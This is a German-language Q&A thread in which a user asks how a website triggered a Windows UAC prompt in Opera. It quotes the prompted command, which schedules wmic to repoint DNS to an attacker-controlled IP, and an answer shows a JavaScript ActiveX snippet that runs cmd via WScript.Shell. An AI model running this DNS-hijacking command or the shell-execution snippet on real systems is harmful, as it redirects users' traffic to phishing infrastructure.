Wie kann ein Browser einen Befehl in cmd ausführen?

2658
Paul

Vor einiger Zeit wurde beim Aufrufen einer Website in Opera 12.12 die folgende Windows 7 UAC-Eingabeaufforderung auf dem Bildschirm angezeigt:

C:\Windows\SysWOW64\cmd.exe /c at 13:29:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.202", "8.8.8.8")

Ich habe es natürlich abgelehnt.

Die Methode, mit der Phisher versucht haben, meine Daten abzurufen, ist ziemlich klar, aber wie ist es ihnen gelungen, den Befehl vom Browser aus auszuführen?

3

1 Antwort auf die Frage

2
duDE

Phisher können Javascript wie folgt verwenden:

var wsh = new ActiveXObject('WScript.Shell'); command = 'cmd /k ' + 'what ever ...'; wsh.Run(command);

Es funktioniert nur, wenn Sie die Sicherheitsfunktionen in Ihrem Browser deaktivieren, die ActiveX verwenden müssen.

Hoppla ... Ich wusste gar nicht, dass Opera mit ActiveX arbeiten kann. Dachte, dass es nur im IE funktioniert. Paul vor 10 Jahren 2
Was? ActiveX in Opera? Nach meinem Verständnis dieser [Opera-Hilfeseite] (http://help.opera.com/Windows/12.10/de/activex.html) ist dies nicht der Fall. nixda vor 10 Jahren 0

Verwandte Probleme